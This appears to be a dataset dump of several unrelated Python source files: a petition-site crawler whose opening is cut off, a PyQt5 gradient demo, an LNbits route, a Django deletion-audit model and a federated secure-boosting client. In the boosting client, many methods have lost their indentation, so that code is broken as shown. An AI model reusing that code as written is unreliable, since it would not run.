                # 5% chance of one random field going missing.
                # Bug fix: applied BEFORE writerow — previously the row was
                # mutated after it had already been written, so this
                # corruption never reached the file.
                if random.random() <= 0.05:
                    key = random.choice(candidates)
                    row[key] = ''
                csvw.writerow(row)
def generate_sampled_data(src_path=None, dst_path=None, sample_rate=None):
    """Randomly sample rows of the full CSV into a smaller CSV.

    The header line is always copied; every data line is then kept
    independently with probability sample_rate.

    Args:
        src_path: source CSV; defaults to CSV_FILE_WHOLE.
        dst_path: destination CSV; defaults to CSV_FILE_SAMPLED.
        sample_rate: per-line keep probability; defaults to SAMPLE_RATE.
    """
    src = CSV_FILE_WHOLE if src_path is None else src_path
    dst = CSV_FILE_SAMPLED if dst_path is None else dst_path
    rate = SAMPLE_RATE if sample_rate is None else sample_rate
    with open(src, 'r') as whole:
        with open(dst, 'w') as sampled:
            # Copy the header line unconditionally.
            sampled.write(whole.readline())
            sampled.writelines(
                line for line in whole if random.random() <= rate
            )
def get_latest_article_id() -> int:
    """Parse the expired-petitions listing page and return the newest
    expired article's id."""
    listing_html = fetch_html('https://www1.president.go.kr/petitions?only=finished')
    soup = BeautifulSoup(listing_html, "html5lib")
    # First subject link on the listing page points at the newest petition.
    href = soup.select_one('.bl_body .bl_wrap .bl_subject a')['href']
    match = re.match(r'.+/petitions/(\d+).*', href)
    return int(match.group(1))
def get_latest_saved_article_id(csv_path=None) -> int:
    """Return the most recently saved article id; 0 when nothing is saved.

    Only the tail of the file (at most ~100 KB) is read, so the call stays
    fast even on a large CSV.

    Args:
        csv_path: CSV to inspect; defaults to CSV_FILE_WHOLE.
    """
    path = CSV_FILE_WHOLE if csv_path is None else csv_path
    # No file yet -> nothing saved.
    if not os.path.isfile(path):
        return 0
    with open(path, 'rb') as f:
        # Jump "almost" to the end so we only read the last few lines.
        f.seek(0, os.SEEK_END)
        f.seek(-min(f.tell(), 1024 * 100), os.SEEK_CUR)
        lines = f.readlines()
    # Robustness fix: an empty file has no last line to parse.
    if not lines:
        return 0
    # The first column of the last line is the article id.
    last_line = lines[-1].decode('utf-8')
    return int(last_line.split(',')[0])
def fetch_article(article_id: int) -> Dict[str, any]:
    """Fetch the petition page for article_id and parse it into a dict.
    Returns None when the page does not exist (404 -> ValueError).

    NOTE(review): the [4:] slices below strip a 4-character Korean field
    label from each info-list item — confirm against the live page markup.
    """
    url = f'https://www1.president.go.kr/petitions/{article_id}'
    try:
        html = fetch_html(url)
    except ValueError:
        return None
    soup = BeautifulSoup(html, "html5lib")
    title = query(soup, '.petitionsView_title')
    votes = int(query(soup, '.petitionsView_count .counter').replace(',', ''))
    category = query(soup, '.petitionsView_info_list li:nth-of-type(1)')[4:]
    start = query(soup, '.petitionsView_info_list li:nth-of-type(2)')[4:]
    end = query(soup, '.petitionsView_info_list li:nth-of-type(3)')[4:]
    # An answered petition shows the '브리핑' (briefing) progress marker and
    # keeps its body in a different <div>.
    answered = query(soup, '.petitionsView_progress h4') == '브리핑'
    if answered:
        content_selector = '.petitionsView_write > div:nth-of-type(4)'
    else:
        content_selector = '.petitionsView_write > div:nth-of-type(2)'
    # Escape newlines/tabs so the content fits on one CSV line.
    content = remove_whitespaces(query(soup, content_selector)) \
        .replace('\n', '\\n') \
        .replace('\t', '\\t')
    return {
        'article_id': article_id,
        'title': title,
        'votes': votes,
        'answered': 1 if answered else 0,
        'category': category,
        'start': start,
        'end': end,
        'content': content,
    }
def save_article(article: Dict[str, any], csv_path=None) -> None:
    """Append one article to the CSV, creating it (with header row) if missing.

    Args:
        article: parsed article fields, as produced by fetch_article().
        csv_path: target CSV; defaults to CSV_FILE_WHOLE.
    """
    path = CSV_FILE_WHOLE if csv_path is None else csv_path
    cols = [
        'article_id', 'start', 'end', 'answered', 'votes', 'category', 'title',
        'content'
    ]
    # Create the file with a header row on first use.
    if not os.path.isfile(path):
        with open(path, 'w', newline='') as f:
            csv.writer(f).writerow(cols)
    # Append the new row.
    with open(path, 'a', newline='') as f:
        csv.writer(f).writerow(article[col] for col in cols)
def fetch_html(url: str) -> str:
    """Fetch a URL and return its body decoded as UTF-8.

    Raises:
        ValueError: when the server answers 404 or a non-200 status code.
        HTTPError: for any other HTTP-level failure.
    """
    try:
        with request.urlopen(url) as f:
            if f.getcode() != 200:
                raise ValueError(f'Invalid status code: {f.getcode()}')
            return f.read().decode('utf-8')
    except HTTPError as e:
        if e.code == 404:
            # Chain the original error so the traceback keeps the HTTP context.
            raise ValueError(f'Not found: {url}') from e
        # Bare raise preserves the original traceback.
        raise
def query(soup: BeautifulSoup, selector: str) -> str:
    """Return the text content of the first element matching the CSS selector."""
    element = soup.select_one(selector)
    return element.text
def remove_whitespaces(text: str) -> str:
    """Strip each line of the body text and drop blank lines."""
    stripped = (line.strip() for line in text.split('\n'))
    # filter(None, ...) removes the empty strings left by blank lines.
    return '\n'.join(filter(None, stripped))
# Run the crawler only when executed directly, not on import.
if __name__ == '__main__':
    main()
| 6,047 | 2,737 |
from PyQt5 import QtGui
from PyQt5.QtWidgets import QApplication, QMainWindow
import sys
from PyQt5.QtGui import QPainter, QBrush, QPen, QLinearGradient
from PyQt5.QtCore import Qt
class Window(QMainWindow):
    """A 400x300 demo window that paints a gradient-filled rectangle."""

    def __init__(self):
        super().__init__()
        self.title = "PyQt5 Window"
        self.top = 200
        self.left = 500
        self.width = 400
        self.height = 300
        self.InitWindow()

    def InitWindow(self):
        """Apply icon, title and geometry, then show the window."""
        self.setWindowIcon(QtGui.QIcon("icon.png"))
        self.setWindowTitle(self.title)
        self.setGeometry(self.left, self.top, self.width, self.height)
        self.show()

    def paintEvent(self, e):
        """Draw a 200x200 rectangle filled with a three-stop linear gradient."""
        painter = QPainter(self)
        painter.setPen(QPen(Qt.black, 0, Qt.SolidLine))
        gradient = QLinearGradient(0, 0, 200, 200)
        for position, color in ((0.0, Qt.darkGray), (0.5, Qt.green), (1.0, Qt.yellow)):
            gradient.setColorAt(position, color)
        painter.setBrush(QBrush(gradient))
        painter.drawRect(10, 10, 200, 200)
# Launch the application only when this file is executed as a script, so
# importing the module (e.g. to reuse Window) does not open a window.
if __name__ == "__main__":
    App = QApplication(sys.argv)
    window = Window()
    sys.exit(App.exec())
| 1,080 | 410 |
from quart import render_template, g
from lnbits.decorators import check_user_exists, validate_uuids
from . import lndhub_ext
@lndhub_ext.route("/")
@validate_uuids(["usr"], required=True)
@check_user_exists()
async def lndhub_index():
    """Render the LNDHub extension index page for the current user."""
    page = await render_template("lndhub/index.html", user=g.user)
    return page
| 317 | 119 |
from django.db import models
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
class DeletedUser(models.Model):
    """Audit record of a user-account deletion: when it happened and which
    kind of actor triggered it."""

    # Actor codes for the deleted_by field.
    DELETED_BY_SELF = 1
    DELETED_BY_STAFF = 2
    DELETED_BY_SYSTEM = 3
    DELETED_BY_CHOICES = (
        (DELETED_BY_SELF, _("By self")),
        (DELETED_BY_STAFF, _("By staff")),
        (DELETED_BY_SYSTEM, _("By system")),
    )
    # When the deletion happened; indexed for time-range queries.
    deleted_on = models.DateTimeField(default=timezone.now, db_index=True)
    # Which actor performed the deletion (one of DELETED_BY_CHOICES).
    deleted_by = models.PositiveIntegerField(choices=DELETED_BY_CHOICES, db_index=True)

    class Meta:
        # Newest records first.
        ordering = ["-id"]
| 600 | 241 |
# Copyright 2021 Tianmian Tech. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
from operator import itemgetter
from typing import List
import numpy as np
from numpy import random
from common.python.utils import log_utils
from kernel.components.binning.horzfeaturebinning.horz_split_points import HorzFeatureBinningClient
from kernel.components.boosting import BoostingTree
from kernel.components.boosting import HorzDecisionTreeClient
from kernel.components.boosting import SecureBoostClientAggregator
from kernel.components.evaluation.param import EvaluateParam
from kernel.model_selection.k_fold import KFold
from kernel.optimizer.loss import FairLoss
from kernel.optimizer.loss import HuberLoss
from kernel.optimizer.loss import LeastAbsoluteErrorLoss
from kernel.optimizer.loss import LeastSquaredErrorLoss
from kernel.optimizer.loss import LogCoshLoss
from kernel.optimizer.loss import SigmoidBinaryCrossEntropyLoss
from kernel.optimizer.loss import SoftmaxCrossEntropyLoss
from kernel.optimizer.loss import TweedieLoss
from kernel.protobuf.generated.boosting_tree_model_meta_pb2 import BoostingTreeModelMeta
from kernel.protobuf.generated.boosting_tree_model_meta_pb2 import DecisionTreeModelMeta, CriterionMeta
from kernel.protobuf.generated.boosting_tree_model_meta_pb2 import ObjectiveMeta
from kernel.protobuf.generated.boosting_tree_model_meta_pb2 import QuantileMeta
from kernel.protobuf.generated.boosting_tree_model_param_pb2 import BoostingTreeModelParam
from kernel.protobuf.generated.boosting_tree_model_param_pb2 import DecisionTreeModelParam
from kernel.protobuf.generated.boosting_tree_model_param_pb2 import FeatureImportanceInfo
from kernel.transfer.variables.transfer_class.horz_secure_boost_transfer_variable import \
HorzSecureBoostingTransferVariable
from kernel.utils import consts
from kernel.utils.data_util import NoneType
from kernel.utils.label_checker import ClassifyLabelChecker, RegressionLabelChecker
LOGGER = log_utils.get_logger()
class HorzSecureBoostingClient(BoostingTree):
    def __init__(self):
        """Initialize training state for the horizontal (data-parallel)
        secure-boosting promoter."""
        super(HorzSecureBoostingClient, self).__init__()
        self.mode = consts.HORZ
        self.validation_strategy = None
        self.loss_fn = None
        self.cur_sample_weights = None
        self.y = None                 # label table
        self.y_hat = None             # running raw-score table during training
        self.y_hat_predict = None     # running raw-score table during predict
        self.feature_num = None
        self.num_classes = 2
        self.tree_dim = 1             # trees per boosting round (num_classes for multiclass)
        self.trees = []
        self.feature_importance = {}  # fid -> accumulated importance
        self.transfer_inst = HorzSecureBoostingTransferVariable()
        self.role = None
        self.data_bin = None
        self.bin_split_points = None
        self.bin_sparse_points = None
        self.init_score = None
        self.local_loss_history = []
        self.classes_ = []
        # NOTE(review): overrides the self.role = None above — this client
        # always acts as the promoter.
        self.role = consts.PROMOTER
        # store learnt model param
        self.tree_meta = None
        self.learnt_tree_param = []
        self.aggregator = SecureBoostClientAggregator()
        # Since arbiter is not needed in oot mode, it will always wait for the data blocking value
        # when creating the HorzFeatureBinningClient object, so the object will not be created here
        self.binning_obj = None
        # self.binning_obj = HorzFeatureBinningClient()
def set_loss_function(self, objective_param):
loss_type = objective_param.objective
params = objective_param.params
LOGGER.info("set objective, objective is {}".format(loss_type))
if self.task_type == consts.CLASSIFICATION:
if loss_type == "cross_entropy":
if self.num_classes == 2:
self.loss_fn = SigmoidBinaryCrossEntropyLoss()
else:
self.loss_fn = SoftmaxCrossEntropyLoss()
else:
raise NotImplementedError("objective %s not supported yet" % (loss_type))
elif self.task_type == consts.REGRESSION:
if loss_type == "lse":
self.loss_fn = LeastSquaredErrorLoss()
elif loss_type == "lae":
self.loss_fn = LeastAbsoluteErrorLoss()
elif loss_type == "huber":
self.loss_fn = HuberLoss(params[0])
elif loss_type == "fair":
self.loss_fn = FairLoss(params[0])
elif loss_type == "tweedie":
self.loss_fn = TweedieLoss(params[0])
elif loss_type == "log_cosh":
self.loss_fn = LogCoshLoss()
else:
raise NotImplementedError("objective %s not supported yet" % loss_type)
else:
raise NotImplementedError("objective %s not supported yet" % loss_type)
def federated_binning(self, data_instance):
# In order to be compatible with oot mode, the object is not created when it is initialized,
# so it can only be created after it is used somewhere
if self.binning_obj is None:
self.binning_obj = HorzFeatureBinningClient()
if self.use_missing:
binning_result = self.binning_obj.average_run(data_instances=data_instance,
bin_num=self.bin_num, abnormal_list=[NoneType()])
else:
binning_result = self.binning_obj.average_run(data_instances=data_instance,
bin_num=self.bin_num)
return self.binning_obj.convert_feature_to_bin(data_instance, binning_result)
    def compute_local_grad_and_hess(self, y_hat):
        """Compute per-sample (gradient, hessian) pairs from labels and scores.

        For classification the raw score is first mapped through the loss
        link function (loss_method.predict); for regression the raw score is
        differentiated directly.
        """
        loss_method = self.loss_fn
        if self.task_type == consts.CLASSIFICATION:
            grad_and_hess = self.y.join(y_hat, lambda y, f_val: \
                (loss_method.compute_grad(y, loss_method.predict(f_val)), \
                 loss_method.compute_hess(y, loss_method.predict(f_val))))
        else:
            grad_and_hess = self.y.join(y_hat, lambda y, f_val:
            (loss_method.compute_grad(y, f_val),
             loss_method.compute_hess(y, f_val)))
        return grad_and_hess
def compute_local_loss(self, y, y_hat):
LOGGER.info('computing local loss')
loss_method = self.loss_fn
if self.objective_param.objective in ["lse", "lae", "logcosh", "tweedie", "log_cosh", "huber"]:
# regression tasks
y_predict = y_hat
else:
# classification tasks
y_predict = y_hat.mapValues(lambda val: loss_method.predict(val))
loss = loss_method.compute_loss(y, y_predict)
return float(loss)
@staticmethod
def get_subtree_grad_and_hess(g_h, t_idx: int):
"""
Args:
g_h of g_h val
t_idx: tree index
Returns: grad and hess of sub tree
"""
LOGGER.info("get grad and hess of tree {}".format(t_idx))
grad_and_hess_subtree = g_h.mapValues(
lambda grad_and_hess: (grad_and_hess[0][t_idx], grad_and_hess[1][t_idx]))
return grad_and_hess_subtree
def sample_valid_feature(self):
if self.feature_num is None:
self.feature_num = self.bin_split_points.shape[0]
chosen_feature = random.choice(range(0, self.feature_num), \
max(1, int(self.subsample_feature_rate * self.feature_num)), replace=False)
valid_features = [False for i in range(self.feature_num)]
for fid in chosen_feature:
valid_features[fid] = True
return valid_features
@staticmethod
def add_y_hat(f_val, new_f_val, lr=0.1, idx=0):
f_val[idx] += lr * new_f_val
return f_val
def update_y_hat_val(self, new_val=None, mode='train', tree_idx=0):
LOGGER.debug('update y_hat value, current tree is {}'.format(tree_idx))
add_func = functools.partial(self.add_y_hat, lr=self.learning_rate, idx=tree_idx)
if mode == 'train':
self.y_hat = self.y_hat.join(new_val, add_func)
else:
self.y_hat_predict = self.y_hat_predict.join(new_val, add_func)
def update_feature_importance(self, tree_feature_importance):
for fid in tree_feature_importance:
if fid not in self.feature_importance:
self.feature_importance[fid] = tree_feature_importance[fid]
else:
self.feature_importance[fid] += tree_feature_importance[fid]
    def sync_feature_num(self):
        """Send the local feature count to the arbiter (idx=-1 broadcasts)."""
        self.transfer_inst.feature_number.remote(self.feature_num, role=consts.ARBITER, idx=-1, suffix=('feat_num',))
    def sync_local_loss(self, cur_loss: float, sample_num: int, suffix):
        """Report this party's loss and sample count to the arbiter so it can
        compute a sample-weighted global loss."""
        data = {'cur_loss': cur_loss, 'sample_num': sample_num}
        self.transfer_inst.loss_status.remote(data, role=consts.ARBITER, idx=-1, suffix=suffix)
        LOGGER.debug('loss status sent')
    def sync_tree_dim(self, tree_dim: int):
        """Broadcast the number of trees per boosting round (1 for
        binary/regression, num_classes for multiclass)."""
        self.transfer_inst.tree_dim.remote(tree_dim, suffix=('tree_dim',))
        LOGGER.debug('tree dim sent')
    def sync_stop_flag(self, suffix) -> bool:
        """Receive the arbiter's early-stopping decision for this round."""
        flag = self.transfer_inst.stop_flag.get(idx=0, suffix=suffix)
        return flag
def check_labels(self, data_inst, ) -> List[int]:
LOGGER.debug('checking labels')
classes_ = None
if self.task_type == consts.CLASSIFICATION:
num_classes, classes_ = ClassifyLabelChecker.validate_label(data_inst)
else:
RegressionLabelChecker.validate_label(data_inst)
return classes_
def generate_flowid(self, round_num, tree_num):
LOGGER.info("generate flowid, flowid {}".format(self.flowid))
return ".".join(map(str, [self.flowid, round_num, tree_num]))
    def label_alignment(self, labels: List[int]):
        """Send the locally observed label values for global label alignment."""
        self.transfer_inst.local_labels.remote(labels, suffix=('label_align',))
    def get_valid_features(self, epoch_idx, t_idx):
        """Fetch the boolean feature mask sampled remotely for tree
        (epoch_idx, t_idx)."""
        valid_feature = self.transfer_inst.valid_features.get(idx=0, suffix=('valid_features', epoch_idx, t_idx))
        return valid_feature
    def fit(self, data_inst, validate_data=None, ):
        """Train the boosting model: bin features, align labels with the
        arbiter, then fit num_trees rounds of horizontal decision trees.

        Args:
            data_inst: training data table.
            validate_data: optional validation table evaluated per epoch.
        """
        # print(data_inst.count())
        # print(list(data_inst.collect()))
        # binning
        data_inst = self.data_alignment(data_inst)
        self.data_bin, self.bin_split_points, self.bin_sparse_points = self.federated_binning(data_inst)
        # NOTE(review): leftover debug print — consider removing.
        print(self.data_bin.first())
        # fid mapping
        self.gen_feature_fid_mapping(data_inst.schema)
        # set feature_num
        self.feature_num = self.bin_split_points.shape[0]
        # sync feature num
        self.sync_feature_num()
        # initialize validation strategy
        self.validation_strategy = self.init_validation_strategy(train_data=data_inst, validate_data=validate_data, )
        # check labels
        local_classes = self.check_labels(self.data_bin)  # e.g. [0, 1]
        # sync label class and set y
        if self.task_type == consts.CLASSIFICATION:
            self.transfer_inst.local_labels.remote(local_classes, role=consts.ARBITER, suffix=('label_align',))
            new_label_mapping = self.transfer_inst.label_mapping.get(idx=0, suffix=('label_mapping',))  # e.g. {0: 0, 1: 1}
            self.classes_ = [new_label_mapping[k] for k in new_label_mapping]
            # set labels
            self.num_classes = len(new_label_mapping)
            LOGGER.debug('num_classes is {}'.format(self.num_classes))
            self.y = self.data_bin.mapValues(lambda instance: new_label_mapping[instance.label])
            # set tree dimension: one tree per class for multiclass
            self.tree_dim = self.num_classes if self.num_classes > 2 else 1
        else:
            self.y = self.data_bin.mapValues(lambda instance: instance.label)
        # print(list(self.y.collect()))
        # set loss function
        self.set_loss_function(self.objective_param)
        # set y_hat_val (initial raw scores + the init score vector)
        self.y_hat, self.init_score = self.loss_fn.initialize(self.y) if self.tree_dim == 1 else \
            self.loss_fn.initialize(self.y, self.tree_dim)
        # print(list(self.y_hat.collect()))
        for epoch_idx in range(self.num_trees):
            g_h = self.compute_local_grad_and_hess(self.y_hat)
            # print(list(g_h.collect()))
            for t_idx in range(self.tree_dim):
                # Boolean mask of features sampled for this tree.
                valid_features = self.get_valid_features(epoch_idx,
                                                         t_idx)
                LOGGER.debug('valid features are {}'.format(valid_features))
                subtree_g_h = self.get_subtree_grad_and_hess(g_h, t_idx)
                flow_id = self.generate_flowid(epoch_idx, t_idx)
                new_tree = HorzDecisionTreeClient(self.tree_param, self.data_bin, self.bin_split_points,
                                                  self.bin_sparse_points, subtree_g_h, valid_feature=valid_features
                                                  , epoch_idx=epoch_idx, role=self.role, tree_idx=t_idx,
                                                  flow_id=flow_id, mode='train')
                new_tree.fit()
                # update y_hat_val with the new tree's sample scores
                self.update_y_hat_val(new_val=new_tree.sample_weights, mode='train', tree_idx=t_idx)
                self.trees.append(new_tree)
                self.tree_meta, new_tree_param = new_tree.get_model()
                self.learnt_tree_param.append(new_tree_param)
                self.update_feature_importance(new_tree.get_feature_importance())
            # sync loss status
            loss = self.compute_local_loss(self.y, self.y_hat)
            LOGGER.debug('local loss of epoch {} is {}'.format(epoch_idx, loss))
            self.local_loss_history.append(loss)
            self.aggregator.send_local_loss(loss, self.data_bin.count(), suffix=(epoch_idx,))
            # validate
            if self.validation_strategy:
                self.validation_strategy.validate(self, epoch_idx)
            # check stop flag if n_iter_no_change is True
            if self.n_iter_no_change:
                should_stop = self.aggregator.get_converge_status(suffix=(str(epoch_idx),))
                LOGGER.debug('got stop flag {}'.format(should_stop))
                if should_stop:
                    LOGGER.debug('stop triggered')
                    break
            self.tracker.add_task_progress(1)
            LOGGER.debug('fitting tree {}/{}'.format(epoch_idx, self.num_trees))
        LOGGER.debug('fitting horz decision tree done')
    def predict(self, data_inst):
        """Score data_inst with every learnt tree and format the result.

        Returns a table of [label, predicted value/class, score(s), detail
        dict], shaped per task type.
        """
        to_predict_data = self.data_alignment(data_inst)
        init_score = self.init_score
        # NOTE(review): initial scores are keyed off the unaligned data_inst
        # while trees score to_predict_data — confirm both tables share keys.
        self.y_hat_predict = data_inst.mapValues(lambda x: init_score)
        round_num = len(self.learnt_tree_param) // self.tree_dim
        idx = 0
        for round_idx in range(round_num):
            for tree_idx in range(self.tree_dim):
                tree_inst = HorzDecisionTreeClient(tree_param=self.tree_param, mode='predict')
                tree_inst.load_model(model_meta=self.tree_meta, model_param=self.learnt_tree_param[idx])
                idx += 1
                predict_val = tree_inst.predict(to_predict_data)
                self.update_y_hat_val(predict_val, mode='predict', tree_idx=tree_idx)
        predict_result = None
        if self.task_type == consts.REGRESSION and \
                self.objective_param.objective in ["lse", "lae", "huber", "log_cosh", "fair", "tweedie"]:
            # Regression: the accumulated raw score is the prediction.
            predict_result = to_predict_data.join(self.y_hat_predict,
                                                  lambda inst, pred: [inst.label, float(pred), float(pred),
                                                                      {"label": float(pred)}])
        elif self.task_type == consts.CLASSIFICATION:
            classes_ = self.classes_
            loss_func = self.loss_fn
            if self.num_classes == 2:
                # Binary: link-function score compared against the threshold.
                predicts = self.y_hat_predict.mapValues(lambda f: float(loss_func.predict(f)))
                threshold = self.predict_param.threshold
                predict_result = to_predict_data.join(predicts, lambda inst, pred: [inst.label,
                                                                                    classes_[1] if pred > threshold else
                                                                                    classes_[0], pred,
                                                                                    {"0": 1 - pred, "1": pred}])
            else:
                # Multiclass: per-class probabilities, argmax wins.
                predicts = self.y_hat_predict.mapValues(lambda f: loss_func.predict(f).tolist())
                predict_result = to_predict_data.join(predicts, lambda inst, preds: [inst.label, \
                                                                                     classes_[np.argmax(preds)],
                                                                                     np.max(preds), dict(
                        zip(map(str, classes_), preds))])
        return predict_result
    def get_feature_importance(self):
        """Return the accumulated per-feature importance mapping (fid -> importance)."""
        return self.feature_importance
    def get_model_meta(self):
        """Serialize training hyper-parameters into a BoostingTreeModelMeta.

        Returns:
            (meta_name, model_meta) pair used as export key and payload.
        """
        model_meta = BoostingTreeModelMeta()
        model_meta.tree_meta.CopyFrom(self.tree_meta)
        model_meta.learning_rate = self.learning_rate
        model_meta.num_trees = self.num_trees
        model_meta.quantile_meta.CopyFrom(QuantileMeta(bin_num=self.bin_num))
        model_meta.objective_meta.CopyFrom(ObjectiveMeta(objective=self.objective_param.objective,
                                                         param=self.objective_param.params))
        model_meta.task_type = self.task_type
        model_meta.n_iter_no_change = self.n_iter_no_change
        model_meta.tol = self.tol
        meta_name = "HorzSecureBoostingTreePromoterMeta"
        return meta_name, model_meta
    def set_model_meta(self, model_meta):
        """Restore hyper-parameters from a saved model meta.

        Accepts either a plain dict (JSON-style export with camelCase keys)
        or a BoostingTreeModelMeta protobuf.
        """
        if type(model_meta) is dict:
            # Dict form: rebuild the tree meta protobuf field by field.
            tree_meta = model_meta.get("treeMeta")
            self.tree_meta = DecisionTreeModelMeta()
            self.tree_meta.max_depth = tree_meta.get("maxDepth")
            self.tree_meta.min_sample_split = tree_meta.get("minSampleSplit")
            self.tree_meta.min_impurity_split = tree_meta.get("minImpuritySplit")
            self.tree_meta.min_leaf_node = tree_meta.get("minLeafNode")
            if tree_meta.get("criterionMeta"):
                self.tree_meta.criterion_meta.CopyFrom(
                    CriterionMeta(criterion_method=tree_meta.get("criterionMeta").get("criterionMethod"),
                                  criterion_param=list(tree_meta.get("criterionMeta").get("criterionParam"))))
            self.tree_meta.use_missing = tree_meta.get("useMissing")
            self.tree_meta.zero_as_missing = tree_meta.get("zeroAsMissing")
            self.learning_rate = model_meta.get("learningRate")
            self.num_trees = model_meta.get("numTrees")
            self.bin_num = model_meta.get("quantileMeta").get("binNum")
            self.objective_param.objective = model_meta.get("objectiveMeta").get("objective")
            self.objective_param.params = list(model_meta.get("objectiveMeta").get("param"))
            self.task_type = model_meta.get("taskType")
            self.n_iter_no_change = model_meta.get("nIterNoChange")
            self.tol = model_meta.get("tol")
        else:
            # Protobuf form: fields map one-to-one.
            self.tree_meta = model_meta.tree_meta
            self.learning_rate = model_meta.learning_rate
            self.num_trees = model_meta.num_trees
            self.bin_num = model_meta.quantile_meta.bin_num
            self.objective_param.objective = model_meta.objective_meta.objective
            self.objective_param.params = list(model_meta.objective_meta.param)
            self.task_type = model_meta.task_type
            self.n_iter_no_change = model_meta.n_iter_no_change
            self.tol = model_meta.tol
    def get_model_param(self):
        """Serialize learnt trees and statistics into a BoostingTreeModelParam.

        Returns:
            (param_name, model_param) pair used as export key and payload.
        """
        model_param = BoostingTreeModelParam()
        model_param.tree_num = len(list(self.learnt_tree_param))
        model_param.tree_dim = self.tree_dim
        model_param.trees_.extend(self.learnt_tree_param)
        model_param.init_score.extend(self.init_score)
        model_param.losses.extend(self.local_loss_history)
        model_param.classes_.extend(map(str, self.classes_))
        model_param.num_classes = self.num_classes
        model_param.best_iteration = -1
        # Feature importances sorted most-important first.
        feature_importance = list(self.get_feature_importance().items())
        feature_importance = sorted(feature_importance, key=itemgetter(1), reverse=True)
        feature_importance_param = []
        for fid, importance in feature_importance:
            feature_importance_param.append(FeatureImportanceInfo(fid=fid,
                                                                  fullname=self.feature_name_fid_mapping[fid],
                                                                  sitename=self.role,
                                                                  importance=importance.importance,
                                                                  importance2=importance.importance_2,
                                                                  main=importance.main_type
                                                                  ))
        model_param.feature_importances.extend(feature_importance_param)
        model_param.feature_name_fid_mapping.update(self.feature_name_fid_mapping)
        param_name = "HorzSecureBoostingTreePromoterParam"
        return param_name, model_param
def get_cur_model(self):
meta_name, meta_protobuf = self.get_model_meta()
param_name, param_protobuf = self.get_model_param()
return {meta_name: meta_protobuf,
param_name: param_protobuf
}
    def set_model_param(self, model_param):
        """Restore learnt trees and statistics from a saved model param.

        Accepts either a plain dict (JSON-style export with camelCase keys)
        or a BoostingTreeModelParam protobuf.
        """
        if type(model_param) is dict:
            # Dict form: rebuild each tree protobuf node by node.
            for tree in list(model_param.get("trees")):
                tree_param = DecisionTreeModelParam()
                for node in tree['tree']:
                    tree_param.tree_.add(id=node['id'],
                                         sitename=node['sitename'],
                                         fid=node['fid'],
                                         bid=node['bid'],
                                         weight=node['weight'],
                                         is_leaf=node['isLeaf'],
                                         left_nodeid=node['leftNodeid'],
                                         right_nodeid=node['rightNodeid'],
                                         missing_dir=node['missingDir'])
                # JSON keys are strings; protobuf maps want int keys.
                splitMaskdict = dict([int(b), v] for b, v in tree['splitMaskdict'].items())
                missingDirMaskdict = dict([int(b), v] for b, v in tree['missingDirMaskdict'].items())
                tree_param.split_maskdict.update(splitMaskdict)
                tree_param.missing_dir_maskdict.update(missingDirMaskdict)
                self.trees.append(tree_param)
                self.learnt_tree_param.append(tree_param)
            # self.learnt_tree_param = list(model_param.get("trees"))
            self.tree_dim = model_param.get("treeDim")
            self.init_score = np.array(list(model_param.get("initScore")))
            self.history_loss = list(model_param.get("losses"))
            self.classes_ = list(map(int, model_param.get("classes")))
            self.num_classes = model_param.get("numClasses")
            featureNameFidMapping = dict([int(b), v] for b, v in model_param['featureNameFidMapping'].items())
            self.feature_name_fid_mapping.update(featureNameFidMapping)
        else:
            # Protobuf form: fields map one-to-one.
            self.learnt_tree_param = list(model_param.trees_)
            self.init_score = np.array(list(model_param.init_score))
            self.local_loss_history = list(model_param.losses)
            self.classes_ = list(model_param.classes_)
            self.tree_dim = model_param.tree_dim
            self.num_classes = model_param.num_classes
            self.feature_name_fid_mapping.update(model_param.feature_name_fid_mapping)
def get_metrics_param(self):
if self.task_type == consts.CLASSIFICATION:
if self.num_classes == 2:
return EvaluateParam(eval_type="binary",
pos_label=self.classes_[1])
else:
return EvaluateParam(eval_type="multi")
else:
return EvaluateParam(eval_type="regression")
def export_model(self):
if self.need_cv:
return None
return self.get_cur_model()
    def load_model(self, model_dict):
        """Restore meta, param and loss function from an exported model dict.

        The container may hold either string keys ending in "Meta"/"Param"
        or nested mappings whose item keys carry those suffixes.
        """
        model_param = None
        model_meta = None
        for _, value in model_dict["model"].items():
            for model in value:
                if type(model) == str:
                    # Flat layout: value maps "...Meta"/"...Param" -> payload.
                    if model.endswith("Meta"):
                        model_meta = value[model]
                    if model.endswith("Param"):
                        model_param = value[model]
                else:
                    # Nested layout: each entry is itself a mapping.
                    for obj in model.items():
                        key = obj[0]
                        if key.endswith("Meta"):
                            model_meta = obj[1]
                        if key.endswith("Param"):
                            model_param = obj[1]
        LOGGER.info("load model")
        self.set_model_meta(model_meta)
        self.set_model_param(model_param)
        # Rebuild the loss function from the restored objective.
        self.set_loss_function(self.objective_param)
def cross_validation(self, data_instances):
if not self.need_run:
return data_instances
kflod_obj = KFold()
cv_param = self._get_cv_param()
kflod_obj.run(cv_param, data_instances, self, True)
return data_instances
| 26,854 | 7,937 |